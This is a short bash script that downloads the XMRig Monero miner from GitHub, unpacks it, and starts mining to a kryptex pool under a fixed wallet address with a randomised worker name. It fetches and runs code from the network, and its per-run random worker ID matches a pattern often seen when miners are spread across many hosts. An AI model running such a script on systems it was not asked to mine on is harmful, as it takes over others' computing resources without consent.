#!/bin/bash
wget https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
tar xf xmrig-6.22.2-linux-static-x64.tar.gz
cd xmrig-6.22.2
./xmrig --donate-level 1 -a rx/0 --url xmr.kryptex.network:7777 --user 8BuaTg6Gxmi1vLku8Gz9ZhN5rpsHbCPYkV1smEpMxipcARrfHUNW3BTb1fbHj48Mmi3uUQ5QGC9dP9yN5Nt2MP9kRt1S9BP/$(echo $(shuf -i 1-15000 -n 1)-A) -k
